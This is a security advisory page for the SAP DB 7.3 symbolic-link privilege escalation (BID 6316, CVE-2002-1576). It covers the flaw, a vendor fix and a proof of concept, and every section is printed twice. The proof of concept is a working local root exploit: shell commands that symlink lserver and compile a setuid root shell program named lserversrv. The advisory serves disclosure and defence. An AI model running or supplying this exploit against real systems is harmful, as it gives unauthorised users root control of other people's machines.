SAP DB Symbolic Link Vulnerability
BID:6316
Info
SAP DB Symbolic Link Vulnerability
| Bugtraq ID: | 6316 |
| Class: | Origin Validation Error |
| CVE: |
CVE-2002-1576 |
| Remote: | No |
| Local: | Yes |
| Published: | Dec 04 2002 12:00AM |
| Updated: | Jul 11 2009 07:16PM |
| Credit: | This vulnerability first detailed in a SAP Security Advisory. |
| Vulnerable: |
SAP DB 7.3 .00 |
| Not Vulnerable: | |
Discussion
SAP DB Symbolic Link Vulnerability
A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory.
An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed.
A vulnerability has been discovered in SAP DB that may allow an unprivileged to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver, when attempting to execute the 'lserversrv' binary in the current directory.
An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' progam in the current directory to be executed.
Exploit / POC
SAP DB Symbolic Link Vulnerability
The following proof of concept was provided by KF
cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver
The following proof of concept was provided by KF
cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver
Solution / Fix
SAP DB Symbolic Link Vulnerability
Solution:
The vendor has stated the following:
Perform the following steps for each <dependent_path>
$ cd <dependent_path>/pgm
$ cp lserversrv lserver
$ chown root lserver
$ chmod +s lserver
Solution:
The vendor has stated the following:
Perform the following steps for each <dependent_path>
$ cd <dependent_path>/pgm
$ cp lserversrv lserver
$ chown root lserver
$ chmod +s lserver